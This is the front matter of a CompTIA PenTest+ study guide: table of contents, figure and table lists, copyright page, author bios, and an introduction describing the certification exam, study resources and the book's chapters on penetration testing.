CompTIA PenTest+ Study Guide E-Book

Table of Contents

Cover

Title Page

Copyright

Dedication

Acknowledgments

About the Author

About the Technical Editor

Introduction

CompTIA

The PenTest+ Exam

What Does This Book Cover?

CompTIA PenTest+ Certification Exam Objectives

Assessment Test

Answers to Assessment Test

Chapter 1: Penetration Testing

What Is Penetration Testing?

Reasons for Penetration Testing

Who Performs Penetration Tests?

The CompTIA Penetration Testing Process

The Cyber Kill Chain

Tools of the Trade

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 2: Planning and Scoping Penetration Tests

Scoping and Planning Engagements

Penetration Testing Standards and Methodologies

Key Legal Concepts for Penetration Tests

Regulatory Compliance Considerations

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 3: Information Gathering

Footprinting and Enumeration

Active Reconnaissance and Enumeration

Information Gathering and Defenses

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 4: Vulnerability Scanning

Identifying Vulnerability Management Requirements

Configuring and Executing Vulnerability Scans

Software Security Testing

Developing a Remediation Workflow

Overcoming Barriers to Vulnerability Scanning

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 5: Analyzing Vulnerability Scans

Reviewing and Interpreting Scan Reports

Validating Scan Results

Common Vulnerabilities

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 6: Exploiting and Pivoting

Exploits and Attacks

Exploitation Toolkits

Exploit Specifics

Leveraging Exploits

Persistence and Evasion

Pivoting

Covering Your Tracks

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 7: Exploiting Network Vulnerabilities

Identifying Exploits

Conducting Network Exploits

Exploiting Windows Services

Identifying and Exploiting Common Services

Wireless Exploits

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 8: Exploiting Physical and Social Vulnerabilities

Physical Facility Penetration Testing

Social Engineering

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 9: Exploiting Application Vulnerabilities

Exploiting Injection Vulnerabilities

Exploiting Authentication Vulnerabilities

Exploiting Authorization Vulnerabilities

Exploiting Web Application Vulnerabilities

Unsecure Coding Practices

Steganography

Application Testing Tools

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 10: Attacking Hosts, Cloud Technologies, and Specialized Systems

Attacking Hosts

Credential Attacks and Testing Tools

Remote Access

Attacking Virtual Machines and Containers

Attacking Cloud Technologies

Attacking Mobile Devices

Attacking IoT, ICS, Embedded Systems, and SCADA Devices

Attacking Data Storage

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 11: Reporting and Communication

The Importance of Communication

Recommending Mitigation Strategies

Writing a Penetration Testing Report

Wrapping Up the Engagement

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 12: Scripting for Penetration Testing

Scripting and Penetration Testing

Variables, Arrays, and Substitutions

Comparison Operations

String Operations

Flow Control

Input and Output (I/O)

Error Handling

Advanced Data Structures

Reusing Code

The Role of Coding in Penetration Testing

Summary

Exam Essentials

Lab Exercises

Review Questions

Appendix A: Answers to Review Questions

Appendix B: Solution to Lab Exercise

Solution to Activity 5.2: Analyzing a CVSS Vector

Index

End User License Agreement

List of Tables

Chapter 1

Table 1.1 Penetration testing tools covered by the PenTest+ exam

Chapter 3

TABLE 3.1 Common ports and services

Chapter 5

TABLE 5.1 CVSS attack vector metric

TABLE 5.2 CVSS attack complexity metric

TABLE 5.3 CVSS privileges required metric

TABLE 5.4 CVSS user interaction metric

TABLE 5.5 CVSS confidentiality metric

TABLE 5.6 CVSS integrity metric

TABLE 5.7 CVSS availability metric

TABLE 5.8 CVSS scope metric

TABLE 5.9 CVSS Qualitative Severity Rating Scale

Chapter 6

TABLE 6.1 Metasploit exploit quality ratings

TABLE 6.2 Metasploit search terms

List of Illustrations

Chapter 1

FIGURE 1.1 The CIA triad

FIGURE 1.2 The DAD triad

FIGURE 1.3 CompTIA penetration testing stages

FIGURE 1.4 The Cyber Kill Chain model

FIGURE 1.5 Cyber Kill Chain in the context of the CompTIA model

Chapter 2

FIGURE 2.1 A logical dataflow diagram

Chapter 3

FIGURE 3.1 ExifTool metadata with location

FIGURE 3.2 FOCA metadata acquisition

FIGURE 3.3 WHOIS query data for google.com

FIGURE 3.4 Host command response for google.com

FIGURE 3.5

nslookup

for netflix.com

FIGURE 3.6 WHOIS of 52.41.111.100

FIGURE 3.7

tracert

of netflix.com

FIGURE 3.8 Shodan result from an exposed Cisco device

FIGURE 3.9 Censys IOS host view

FIGURE 3.10 A Google search for

passwords.xls

FIGURE 3.11 Nmap scan using OS identification

FIGURE 3.12 Nmap output of a Windows 10 system

FIGURE 3.13 Zenmap topology view

FIGURE 3.14 Scapy packet crafting for a TCP ping

FIGURE 3.15 ARP query and response

FIGURE 3.16 Harvesting emails using Metasploit

FIGURE 3.17 Netcat banner grabbing

FIGURE 3.18 Excerpt of strings run on the Netcat binary

Chapter 4

FIGURE 4.1 FIPS 199 Standards

FIGURE 4.2 Qualys asset map

FIGURE 4.3 Configuring a Nessus scan

FIGURE 4.4 Sample Nessus scan report

FIGURE 4.5 Nessus scan templates

FIGURE 4.6 Disabling unused plug‐ins

FIGURE 4.7 Configuring authenticated scanning

FIGURE 4.8 Choosing a scan appliance

FIGURE 4.9 National Cyber Awareness System Vulnerability Summary

FIGURE 4.10 Setting automatic updates in Nessus

FIGURE 4.11 Acunetix web application scan vulnerability report

FIGURE 4.12 Nikto web application scan results

FIGURE 4.13 Running a Wapiti scan

FIGURE 4.14 WPScan WordPress vulnerability scanner

FIGURE 4.15 Nessus web application scanner

FIGURE 4.16 Tamper Data session showing login data

FIGURE 4.17 Scanning a database‐backed application with SQLmap

FIGURE 4.18 Vulnerability management life cycle

FIGURE 4.19 Qualys scan performance settings

Chapter 5

FIGURE 5.1 Nessus vulnerability scan report

FIGURE 5.2 Qualys vulnerability scan report

FIGURE 5.3 OpenVAS vulnerability scan report

FIGURE 5.4 Scan report showing vulnerabilities and best practices

FIGURE 5.5 Vulnerability trend analysis

FIGURE 5.6 Vulnerabilities exploited in 2015 by year of initial discovery...

FIGURE 5.7 Missing patch vulnerability

FIGURE 5.8 Unsupported operating system vulnerability

FIGURE 5.9 Dirty COW website

FIGURE 5.10 Code execution vulnerability

FIGURE 5.11 Spectre and Meltdown dashboard from QualysGuard

FIGURE 5.12 FTP cleartext authentication vulnerability

FIGURE 5.13 Debug mode vulnerability

FIGURE 5.14 Outdated SSL version vulnerability

FIGURE 5.15 Insecure SSL cipher vulnerability

FIGURE 5.16 Invalid certificate warning

FIGURE 5.17 DNS amplification vulnerability

FIGURE 5.18 Internal IP disclosure vulnerability

FIGURE 5.19 Inside a virtual host

FIGURE 5.20 SQL injection vulnerability

FIGURE 5.21 Cross‐site scripting vulnerability

FIGURE 5.22 First vulnerability report

FIGURE 5.23 Second vulnerability report

Chapter 6

FIGURE 6.1 OpenVAS/Greenbone vulnerability report

FIGURE 6.2 Distributed Ruby vulnerability

FIGURE 6.3

phpinfo()

output accessible

FIGURE 6.4

phpinfo.php

output

FIGURE 6.5 The Metasploit console

FIGURE 6.6 Running

show exploits

in Metasploit

FIGURE 6.7 Selecting an exploit

FIGURE 6.8 Setting module options

FIGURE 6.9 Successful exploit

FIGURE 6.10 WMImplant WMI tools

FIGURE 6.11 CrackMapExec's main screen

FIGURE 6.12 Responder capture flow

FIGURE 6.13 Pass‐the‐hash flow

FIGURE 6.14 John the Ripper

FIGURE 6.15 Pivoting

Chapter 7

FIGURE 7.1 Double‐tagged Ethernet packet

FIGURE 7.2 Yersinia 802.1q attack selection

FIGURE 7.3 DNS cache poisoning attack

FIGURE 7.4 ARP spoofing

FIGURE 7.5 Manually configuring a MAC address in Windows 10

FIGURE 7.6 Metasploit SYN flood

FIGURE 7.7 NetBIOS name service attack

FIGURE 7.8 Responder sending poisoned answers

FIGURE 7.9 Responder capturing hashes

FIGURE 7.10 Output from

snmpwalk

FIGURE 7.11 THC Hydra SSH brute‐force attack

FIGURE 7.12 WiGLE map showing access point density in a metropolitan area

FIGURE 7.13 RFID cloner and tags

Chapter 8

FIGURE 8.1 A typical security vestibule design

FIGURE 8.2 SET menu

FIGURE 8.3 SET loading the Metasploit reverse TCP handler

FIGURE 8.4 BeEF hooked browser detail

FIGURE 8.5 BeEF commands usable in a hooked browser

Chapter 9

FIGURE 9.1 Web application firewall

FIGURE 9.2 Account number input page

FIGURE 9.3 Account information page

FIGURE 9.4 Account information pageafter blind SQL injection

FIGURE 9.5 Account creation page

FIGURE 9.6 Zyxel router default password

FIGURE 9.7 Session authentication with cookies

FIGURE 9.8 Session cookie from CNN.com

FIGURE 9.9 Session hijacking with cookies

FIGURE 9.10 Kerberos authentication process

FIGURE 9.11 Example web server directory structure

FIGURE 9.12 Directory scanning with DirBuster

FIGURE 9.13 Message board post rendered in a browser

FIGURE 9.14 XSS attack rendered in a browser

FIGURE 9.15 SQL error disclosure

FIGURE 9.16 (a) Unaltered photograph (b) Photograph with hidden message embe...

FIGURE 9.17 Zed Attack Proxy (ZAP)

FIGURE 9.18 Burp Proxy

FIGURE 9.19 The american fuzzy lop performing fuzz testing

FIGURE 9.20 Gobuster DNS enumeration

Chapter 10

FIGURE 10.1 SUID files in Kali

FIGURE 10.2 SUID files with details

FIGURE 10.3 Abusing

sudo

rights

FIGURE 10.4 Checking Linux kernel version information

FIGURE 10.5 Dumping the Windows SAM with Mimikatz

FIGURE 10.6 Hashcat cracking Linux passwords

FIGURE 10.7 Metasploit reverse TCP shell

FIGURE 10.8 Detecting virtualization on a Windows system

FIGURE 10.9 Detecting virtualization on Kali Linux

FIGURE 10.10 Side‐channel attack against a virtual machine

FIGURE 10.11 A simple SCADA environment design example

Chapter 11

FIGURE 11.1 Smartphone‐based multifactor authentication

Chapter 12

FIGURE 12.1 Executing Hello, World! using JavaScript in the Chrome browser

FIGURE 12.2 Executing the cupcake calculator using JavaScript in the Chrome ...

FIGURE 12.3 URL encoding using JavaScript in the Chrome browser

FIGURE 12.4 Identifying the language of a conditional execution statement

FIGURE 12.5 Identifying the language of a

for

loop

FIGURE 12.6 Identifying the language of a

while

loop

FIGURE 12.7 Storing DNS information in a tree data structure

Guide

Cover Page

Table of Contents

Title Page

Copyright

Dedication

Acknowledgments

About the Author

About the Technical Editor

Introduction

Begin Reading

Appendix A: Answers to Review Questions

Appendix B: Solution to Lab Exercise

Index

End User License Agreement

Pages

iii

iv

v

vii

ix

xi

xxv

xxvi

xxvii

xxviii

xxix

xxx

xxxi

xxxii

xxxiii

xxxiv

xxxv

xxxvi

xxxvii

xxxviii

xxxix

xl

xli

xlii

xliii

xliv

xlv

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

346

347

348

349

350

351

352

353

355

356

357

358

359

360

361

362

363

364

365

366

367

368

369

370

371

372

373

374

375

376

377

378

379

380

381

382

383

384

385

386

387

388

389

390

391

392

393

394

395

396

397

398

399

400

401

402

403

405

406

407

408

409

410

411

412

413

414

415

416

417

418

419

420

421

422

423

424

425

426

427

429

430

431

432

433

434

435

436

437

438

439

440

441

442

443

444

445

446

447

448

449

450

451

452

453

454

455

456

457

458

459

460

461

462

463

464

465

466

467

468

469

470

471

472

473

474

475

476

477

478

479

480

481

482

483

484

485

486

487

488

489

490

491

492

493

494

495

496

497

498

499

500

501

502

503

504

505

506

507

509

510

511

512

513

514

515

516

517

518

519

520

521

522

523

524

525

526

527

528

529

530

531

CompTIA® PenTest+®Study Guide

Exam PT0-002

Second Edition

Copyright © 2022 by John Wiley & Sons, Inc. All rights reserved.

Published by John Wiley & Sons, Inc., Hoboken, New Jersey.

Published simultaneously in Canada.

978-1-119-82381-0978-1-119-82383-4 (ebk.)978-1-119-82382-7 (ebk.)

No part of this publication may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, electronic, mechanical, photocopying, recording, scanning, or otherwise, except as permitted under Section 107 or 108 of the 1976 United States Copyright Act, without either the prior written permission of the Publisher, or authorization through payment of the appropriate per-copy fee to the Copyright Clearance Center, Inc., 222 Rosewood Drive, Danvers, MA 01923, (978) 750-8400, fax (978) 750-4470, or on the web at www.copyright.com . Requests to the Publisher for permission should be addressed to the Permissions Department, John Wiley & Sons, Inc., 111 River Street, Hoboken, NJ 07030, (201) 748-6011, fax (201) 748-6008, or online at http://www.wiley.com/go/permission .

Limit of Liability/Disclaimer of Warranty: The publisher and the author make no representations or warranties with respect to the accuracy or completeness of the contents of this work and specifically disclaim all warranties, including without limitation warranties of fitness for a particular purpose. No warranty may be created or extended by sales or promotional materials. The advice and strategies contained herein may not be suitable for every situation. This work is sold with the understanding that the publisher is not engaged in rendering legal, accounting, or other professional services. If professional assistance is required, the services of a competent professional person should be sought. Neither the publisher nor the author shall be liable for damages arising herefrom. The fact that an organization or Website is referred to in this work as a citation and/or a potential source of further information does not mean that the author or the publisher endorses the information the organization or Website may provide or recommendations it may make. Further, readers should be aware the Internet Websites listed in this work may have changed or disappeared between when this work was written and when it is read.

For general information on our other products and services or for technical support, please contact our Customer Care Department within the United States at (800) 762-2974, outside the United States at (317) 572-3993 or fax (317) 572-4002.

Wiley also publishes its books in a variety of electronic formats. Some content that appears in print may not be available in electronic formats. For more information about Wiley products, visit our web site at www.wiley.com .

Library of Congress Control Number: 2021944464

Trademarks: WILEY, the Wiley logo, Sybex, and the Sybex logo are trademarks or registered trademarks of John Wiley & Sons, Inc. and/or its affiliates, in the United States and other countries, and may not be used without written permission. CompTIA and PenTest+ are trademarks or registered trademarks of The Computing Technology Industry Association, Inc. DBA CompTIA, Inc. All other trademarks are the property of their respective owners.

John Wiley & Sons, Inc. is not associated with any product or vendor mentioned in this book.

Cover image: © Getty Images Inc./Jeremy Woodhouse

Cover design: Wiley

This book is dedicated to Ron Kraemer—a mentor, friend, and wonderful boss.

Acknowledgments

Books like this involve work from many people, and as authors, we truly appreciate the hard work and dedication that the team at Wiley shows. We would especially like to thank Senior Acquisitions Editor Kenyon Brown. We have worked with Ken on multiple projects and consistently enjoy our work with him.

We also greatly appreciated the editing and production team for the book, including John Sleeva, our project editor, whose prompt and consistent oversight got this book out the door, and Barath Kumar Rajasekaran, our content refinement specialist, who guided us through layouts, formatting, and final cleanup to produce a great book. We'd also like to thank our technical editor, Nadean Tanner, who provided us with thought‐provoking questions and technical insight throughout the process. We would also like to thank the many behind‐the‐scenes contributors, including the graphics, production, and technical teams who make the book and companion materials into a finished product.

Our agent, Carole Jelen of Waterside Productions, continues to provide us with wonderful opportunities, advice, and assistance throughout our writing careers.

Finally, we would like to thank our families, friends, and significant others who support us through the late evenings, busy weekends, and long hours that a book like this requires to write, edit, and get to press.

About the Author

Mike Chapple, PhD, Security+, CISSP, CISA, PenTest+, CySA+, is a teaching professor of IT, analytics, and operations at the University of Notre Dame. He is also the academic director of the University's master's program in business analytics.

Mike is a cybersecurity professional with over 20 years of experience in the field. Prior to his current role, Mike served as senior director for IT service delivery at Notre Dame, where he oversaw the University's cybersecurity program, cloud computing efforts, and other areas. Mike also previously served as chief information officer of Brand Institute and an information security researcher with the National Security Agency and the U.S. Air Force.

Mike is a frequent contributor to several magazines and websites and is the author or coauthor of more than 25 books, including CISSP Official (ISC)2 Study Guide (Wiley, 2021), CISSP Official (ISC)2 Practice Tests (Wiley, 2021), CompTIA Security+ Study Guide (Wiley, 2020), CompTIA CySA+ Study Guide (Wiley, 2020), CompTIA CySA+ Practice Tests (Wiley, 2020), and Cybersecurity: Information Operations in a Connected World (Jones and Bartlett, 2021).

Mike offers free study groups for the PenTest+, CySA+, Security+, CISSP, and SSCP certifications at his website, certmike.com .

David Seidl, CISSP, PenTest+, is vice president for information technology and CIO at Miami University. During his IT career, he has served in a variety of technical and information security roles, including serving as the senior director for campus technology services at the University of Notre Dame, where he co‐led Notre Dame's move to the cloud and oversaw cloud operations, ERP, databases, identity management, and a broad range of other technologies and service. He also served as Notre Dame's director of information security and led Notre Dame's information security program. He has taught information security and networking undergraduate courses as an instructor for Notre Dame's Mendoza College of Business, and he has written books on security certification and cyberwarfare, including co‐authoring the previous editions of CISSP (ISC)2Official Practice Tests (Sybex, 2018) as well as CISSP Official (ISC)2 Practice Tests (Wiley, 2021), CompTIA Security+ Study Guide (Wiley, 2020), CompTIA Security+ Practice Tests (Wiley, 2020), CompTIA CySA+ Study Guide (Wiley, 2020), CompTIA CySA+ Practice Tests (Wiley, 2020), and Cybersecurity: Information Operations in a Connected World (Jones and Bartlett, 2021), and CompTIA Security+ Practice Tests: Exam SY0‐601, as well as other certification guides and books on information security.

David holds a bachelor's degree in communication technology and a master's degree in information security from Eastern Michigan University, as well as CISSP, CySA+, PenTest+, GPEN, and GCIH certifications.

About the Technical Editor

Nadean Hutto Tanner is the manager of Consulting‐Education Services at FireEye/Mandiant, working most recently on building real‐world cyber‐range engagements to practice threat hunting and incident response. She has been in IT for more than 20 years and in cybersecurity specifically for over a decade. She holds over 30 industry certifications, including CompTIA CASP+ and ISC2 CISSP.

Tanner has trained and consulted for Fortune 500 companies and the U.S. Department of Defense in cybersecurity, forensics, analysis, red/blue teaming, vulnerability management, and security awareness.

She is the author of the Cybersecurity Blue Team Toolkit (Wiley, 2019) and CASP+ Practice Tests: Exam CAS‐003 (Sybex, 2020). She also was the technical editor for the CompTIA Security+ Study Guide: Exam SY0‐601 (Sybex, 2021), written by Mike Chapple and David Seidl.

In her spare time, she enjoys speaking at technical conferences such as Black Hat, Wild West Hacking Fest, and OWASP events.

Introduction

The CompTIA®PenTest+® Study Guide: Exam PT0‐002Second Edition provides accessible explanations and real‐world knowledge about the exam objectives that make up the PenTest+ certification. This book will help you to assess your knowledge before taking the exam, as well as provide a stepping‐stone to further learning in areas where you may want to expand your skill set or expertise.

Before you tackle the PenTest+ exam, you should already be a security practitioner. CompTIA suggests that test‐takers should have intermediate‐level skills based on their cybersecurity pathway. You should also be familiar with at least some of the tools and techniques described in this book. You don't need to know every tool, but understanding how to use existing experience to approach a new scenario, tool, or technology that you may not know is critical to passing the PenTest+ exam.

CompTIA

CompTIA is a nonprofit trade organization that offers certification in a variety of IT areas, ranging from the skills that a PC support technician needs, which are covered in the A+ exam, to advanced certifications like the CompTIA Advanced Security Practitioner, or CASP, certification. CompTIA divides its exams into three categories based on the skill level required for the exam and what topics it covers, as shown in the following table:

Beginner/Novice

Intermediate

Advanced

IT Fundamentals A+

Network+ Security+ CySA+ PenTest+

CASP

CompTIA recommends that practitioners follow a cybersecurity career path that begins with the IT fundamentals and A+ exam and proceeds to include the Network+ and Security+ credentials to complete the foundation. From there, cybersecurity professionals may choose the PenTest+ and/or Cybersecurity Analyst+ (CySA+) certifications before attempting the CompTIA Advanced Security Practitioner (CASP) certification as a capstone credential.

The CySA+ and PenTest+ exams are more advanced exams, intended for professionals with hands‐on experience who also possess the knowledge covered by the prior exams.

CompTIA certifications are ISO and ANSI accredited, and they are used throughout multiple industries as a measure of technical skill and knowledge. In addition, CompTIA certifications, including the Security+ and the CASP, have been approved by the U.S. government as Information Assurance baseline certifications and are included in the State Department's Skills Incentive Program.

The PenTest+ Exam

The PenTest+ exam is designed to be a vendor‐neutral certification for penetration testers. It is designed to assess current penetration testing, vulnerability assessment, and vulnerability management skills with a focus on network resiliency testing. Successful test‐takers will prove their ability plan and scope assessments, handle legal and compliance requirements, and perform vulnerability scanning and penetration testing activities using a variety of tools and techniques, and then analyze the results of those activities.

It covers five major domains:

Planning and Scoping

Information Gathering and Vulnerability Scanning

Attacks and Exploits

Reporting and Communication

Tools and Code Analysis

These five areas include a range of subtopics, from scoping penetration tests to performing host enumeration and exploits, while focusing heavily on scenario‐based learning.

The PenTest+ exam fits between the entry‐level Security+ exam and the CompTIA Advanced Security Practitioner (CASP) certification, providing a mid‐career certification for those who are seeking the next step in their certification and career path while specializing in penetration testing or vulnerability management.

The PenTest+ exam is conducted in a format that CompTIA calls “performance‐based assessment.” This means that the exam uses hands‐on simulations using actual security tools and scenarios to perform tasks that match those found in the daily work of a security practitioner. There may be numerous types of exam questions, such as multiple‐choice, fill‐in‐the‐blank, multiple‐response, drag‐and‐drop, and image‐based problems.

CompTIA recommends that test‐takers have three or four years of information security–related experience before taking this exam and that they have taken the Security+ exam or have equivalent experience, including technical, hands‐on expertise. The exam costs $370 in the United States, with roughly equivalent prices in other locations around the globe. More details about the PenTest+ exam and how to take it can be found at:

https://certification.comptia.org/certifications/pentest

Study and Exam Preparation Tips

A test preparation book like this cannot teach you every possible security software package, scenario, and specific technology that may appear on the exam. Instead, you should focus on whether you are familiar with the type or category of technology, tool, process, or scenario presented as you read the book. If you identify a gap, you may want to find additional tools to help you learn more about those topics.

Additional resources for hands‐on exercises include the following:

Exploit-Exercises.com

provides virtual machines, documentation, and challenges covering a wide range of security issues at

https://exploit-exercises.com

.

Hacking‐Lab provides capture‐the‐flag (CTF) exercises in a variety of fields at

https://www.hacking-lab.com/index.html

.

The OWASP Hacking Lab provides excellent web application–focused exercises at

https://www.owasp.org/index.php/OWASP_Hacking_Lab

.

PentesterLab provides a subscription‐based access to penetration testing exercises at

https://www.pentesterlab.com/exercises

.

Since the exam uses scenario‐based learning, expect the questions to involve analysis and thought rather than relying on simple memorization. As you might expect, it is impossible to replicate that experience in a book, so the questions here are intended to help you be confident that you know the topic well enough to think through hands‐on exercises.

Taking the Exam

Once you are fully prepared to take the exam, you can visit the CompTIA website to purchase your exam voucher:

https://store.comptia.org/Certification-Vouchers/c/11293

CompTIA partners with Pearson VUE's testing centers, so your next step will be to locate a testing center near you. In the United States, you can do this based on your address or your zip code, while non‐U.S. test‐takers may find it easier to enter their city and country. You can search for a test center near you at:

http://www.pearsonvue.com/comptia/locate

Now that you know where you'd like to take the exam, simply set up a Pearson VUE testing account and schedule an exam:

https://home.pearsonvue.com/comptia/onvue

On the day of the test, take two forms of identification, and make sure to show up with plenty of time before the exam starts. Remember that you will not be able to take your notes, electronic devices (including smartphones and watches), or other materials in with you.

In some countries, including the United States, you may be eligible to take the test online from your home or office through the Pearson OnVUE program. For more information on this program and current availability, see:

https://home.pearsonvue.com/Clients/CompTIA/OnVUE-online-proctored.aspx

After the PenTest+ Exam

Once you have taken the exam, you will be notified of your score immediately, so you'll know if you passed the test right away. You should keep track of your score report with your exam registration records and the email address you used to register for the exam. If you've passed, you'll receive a handsome certificate, similar to the one shown here:

Maintaining Your Certification

CompTIA certifications must be renewed on a periodic basis. To renew your certification, you can either pass the most current version of the exam, earn a qualifying higher‐level CompTIA or industry certification, or complete sufficient continuing education activities to earn enough continuing education units (CEUs) to renew it.

CompTIA provides information on renewals via their website at:

https://certification.comptia.org/continuing-education/how-to-renew

When you sign up to renew your certification, you will be asked to agree to the CE program's Code of Ethics, to pay a renewal fee, and to submit the materials required for your chosen renewal method.

A full list of the industry certifications you can use to acquire CEUs toward renewing the PenTest+ can be found at:

https://certification.comptia.org/continuing-education/choose/renewal-options

What Does This Book Cover?

This book is designed to cover the five domains included in the PenTest+ exam:

Chapter 1

: Penetration Testing

   Learn the basics of penetration testing as you begin an in‐depth exploration of the field. In this chapter, you will learn why organizations conduct penetration testing and the role of the penetration test in a cybersecurity program.

Chapter 2

: Planning and Scoping Penetration Tests

   Proper planning is critical to a penetration test. In this chapter, you will learn how to define the rules of engagement, scope, budget, and other details that need to be determined before a penetration test starts. Details of contracts, compliance and legal concerns, and authorization are all discussed so that you can make sure you are covered before a test starts.

Chapter 3

: Information Gathering

   Gathering information is one of the earliest stages of a penetration test. In this chapter you will learn how to gather open source intelligence (OSINT) via passive means. Once you have OSINT, you can leverage the active scanning and enumeration techniques and tools you will learn about in the second half of the chapter.

Chapter 4

: Vulnerability Scanning

   Managing vulnerabilities helps to keep your systems secure. In this chapter, you will learn how to conduct vulnerability scans and use them as an important information source for penetration testing.

Chapter 5

: Analyzing Vulnerability Scans

   Vulnerability reports can contain huge amounts of data about potential problems with systems. In this chapter, you will learn how to read and analyze a vulnerability scan report, what CVSS scoring is and what it means, as well as how to choose the appropriate actions to remediate the issues you have found. Along the way, you will explore common types of vulnerabilities, their impact on systems and networks, and how they might be exploited during a penetration test.

Chapter 6

: Exploiting and Pivoting

   Once you have a list of vulnerabilities, you can move on to prioritizing the exploits based on the likelihood of success and availability of attack methods. In this chapter, you will explore common attack techniques and tools and when to use them. Once you have gained access, you can pivot to other systems or networks that may not have been accessible previously. You will learn tools and techniques that are useful for lateral movement once you're inside a network's security boundaries, how to cover your tracks, and how to hide the evidence of your efforts.

Chapter 7

: Exploiting Network Vulnerabilities

   Penetration testers often start with network attacks against common services. In this chapter, you will explore the most frequently attacked services, including NetBIOS, SMB, SNMP, and others. You will learn about on‐path attacks, network‐specific techniques, and how to attack wireless networks and systems.

Chapter 8

: Exploiting Physical and Social Vulnerabilities

   Humans are the most vulnerable part of an organization's security posture, and penetration testers need to know how to exploit the human element of an organization. In this chapter, you will explore social engineering methods, motivation techniques, and social engineering tools. Once you know how to leverage human behavior, you will explore how to gain and leverage physical access to buildings and other secured areas.

Chapter 9

: Exploiting Application Vulnerabilities

   Applications are the go‐to starting point for testers and hackers alike. If an attacker can break through the security of a web application and access the back‐end systems supporting that application, they often have the starting point they need to wage a full‐scale attack. In this chapter, we examine many of the application vulnerabilities that are commonly exploited during penetration tests.

Chapter 10

: Attacking Hosts, Cloud Technologies, and Specialized Systems

   Attacking hosts relies on understanding operating system–specific vulnerabilities for Windows and Linux as well as common problems found on almost all operating systems. In this chapter, you will learn about attack methods used against both Windows and Linux hosts, credential attacks and password cracking, how virtual machines and container attacks work, and attack vectors and techniques used against cloud technologies. You'll also explore attacks against mobile devices, IoT and industrial control systems, data storage, and other specialized systems.

Chapter 11

: Reporting and Communication

   Penetration tests are only useful to the organization if the penetration testers are able to effectively communicate the state of the organization to management and technical staff. In this chapter, we turn our attention to that crucial final phase of a penetration test: reporting and communicating our results.

Chapter 12

: Scripting for Penetration Testing

   Scripting languages provide a means to automate the repetitive tasks of penetration testing. Penetration testers do not need to be software engineers. Generally speaking, pentesters don't write extremely lengthy code or develop applications that will be used by many other people. The primary development skill that a penetration tester should acquire is the ability to read fairly simple scripts written in a variety of common languages and adapt them to their own unique needs. That's what we'll explore in this chapter.

Practice Exam

   Once you have completed your studies, the practice exam will provide you with a chance to test your knowledge. Use this exam to find places where you may need to study more or to verify that you are ready to tackle the exam. We'll be rooting for you!

Appendix: Answers to Chapter Review Questions

   The Appendix has answers to the review questions you will find at the end of each chapter.

Objective Mapping

The following listing summarizes how the major PenTest+ objective areas map to the chapters in this book. If you want to study a specific domain, this mapping can help you identify where to focus your reading.

Planning and Scoping:

Chapters 1

,

2

Information Gathering and Vulnerability Scanning:

Chapters 3

,

4

,

5

,

6

,

Attacks and Exploits:

Chapters 6

,

7

,

8

,

9

,

10

Reporting and Communications:

Chapter 11

Tools and Code Analysis: Chapters

3

,

4

,

5

,

6

,

7

,

8

,

9

,

10

,

11

,

12

Later in this introduction you'll find a detailed map showing where every objective topic is covered.

The book is written to build your knowledge as you progress through it, so starting at the beginning is a good idea. Each chapter includes notes on important content and practice questions to help you test your knowledge. Once you are ready, a complete practice test is provided to assess your knowledge.

Study Guide Elements

This study guide uses a number of common elements to help you prepare. These include the following:

Summaries

   The summary section of each chapter briefly explains the chapter, allowing you to easily understand what it covers.

Exam Essentials

   The exam essentials focus on major exam topics and critical knowledge that you should take into the test. The exam essentials focus on the exam objectives provided by CompTIA.

Chapter Review Questions

   A set of questions at the end of each chapter will help you assess your knowledge and whether you are ready to take the exam based on your knowledge of that chapter's topics.

Lab Exercises

   The lab exercises provide more in‐depth practice opportunities to expand your skills and to better prepare for performance‐based testing on the PenTest+ exam.

Real‐World Scenarios

   The real‐world scenarios included in each chapter tell stories and provide examples of how topics in the chapter look from the point of view of a security professional. They include current events, personal experience, and approaches to actual problems.

Interactive Online Learning Environment

The interactive online learning environment that accompanies CompTIA® PenTest+® Study Guide: Exam PT0‐002 Second Edition provides a test bank with study tools to help you prepare for the certification exam—and increase your chances of passing it the first time! The test bank includes the following elements:

Sample Tests

   All of the questions in this book are available online, including the assessment test, which you'll find at the end of this introduction, and the chapter tests that include the review questions at the end of each chapter. In addition, there is a practice exam. Use these questions to test your knowledge of the study guide material. The online test bank runs on multiple devices.

Flashcards

   Questions are provided in digital flashcard format (a question followed by a single correct answer). You can use the flashcards to reinforce your learning and provide last‐minute test prep before the exam.

Other Study Tools

   A glossary of key terms from this book and their definitions is available as a fully searchable PDF.

Go to http://www.wiley.com/go/sybextestprep to register and gain access to this interactive online learning environment and test bank with study tools.

CompTIA PenTest+ Certification Exam Objectives

